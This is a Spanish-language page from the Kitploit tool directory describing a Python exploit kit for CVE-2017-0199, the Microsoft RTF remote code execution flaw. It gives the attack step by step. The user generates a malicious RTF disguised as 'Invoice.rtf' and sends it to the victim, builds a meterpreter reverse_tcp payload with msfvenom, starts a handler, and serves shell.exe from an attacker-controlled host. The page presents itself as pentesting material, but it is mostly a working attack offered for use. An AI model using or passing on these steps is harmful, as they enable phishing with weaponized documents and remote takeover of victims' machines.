Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-0199 — El kit de explotación CVE-2017-0199 - v2.0 es un práctico script de Python que proporciona una forma rápida y efectiva de explotar la RCE de Microsoft RTF. Puede generar un archivo RTF malicioso y entregar el payload de metasploit/meterpreter a la víctima sin ninguna configuración compleja. | Kitploit
Herramientas/GitHubGitHub/n1shant-sinha/cve-2017-0199
Frameworks de ExploitsGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubn1shant-sinha/cve-2017-0199

CVE-2017-0199

Ver Repositorio
242hace 9 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

El kit de explotación CVE-2017-0199 - v2.0 es un práctico script de Python que proporciona una forma rápida y efectiva de explotar la RCE de Microsoft RTF. Puede generar un archivo RTF malicioso y entregar el payload de metasploit/meterpreter a la víctima sin ninguna configuración compleja.

Compartir

CVE-2017-0199

El toolkit de explotación CVE-2017-0199 - v2.0 es un práctico script en Python que proporciona una forma rápida y efectiva de explotar la ejecución remota de código en Microsoft RTF. Puede generar un archivo RTF malicioso y entregar la carga útil de metasploit / meterpreter a la víctima sin necesidad de configuraciones complejas.

Nota de la versión:

Se introdujeron las siguientes capacidades al script

  • Generar archivo RTF malicioso usando el toolkit
  • Ejecutar el toolkit en modo de explotación como un pequeño servidor HTA + Web Versión: Python version 2.7.13

Ejemplo:

Paso 1: Generar archivo RTF malicioso usando el siguiente comando y enviarlo a la víctima

Sintaxis:

python cve-2017-0199_toolkit.py -M gen -w <nombre_archivo.rtf> -u http://atacante.com/test.hta

Ejemplo:

python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.133.128/logo.doc

Paso 2 (Opcional, si se usa carga útil de MSF) : Generar carga útil de metasploit e iniciar el manejador

Ejemplo:

Generar carga útil:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe

Iniciar manejador:

msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.133.128; run"

Paso 3: Iniciar el toolkit en modo de explotación para entregar las cargas útiles

Sintaxis:

python cve-2017-0199_toolkit.py -M exp -e http://atacante.com/shell.exe -l </tmp/shell.exe>

Ejemplo:

python cve-2017-0199_toolkit.py -M exp -e http://192.168.133.128/shell.exe -l /tmp/shell.exe

Descargar herramienta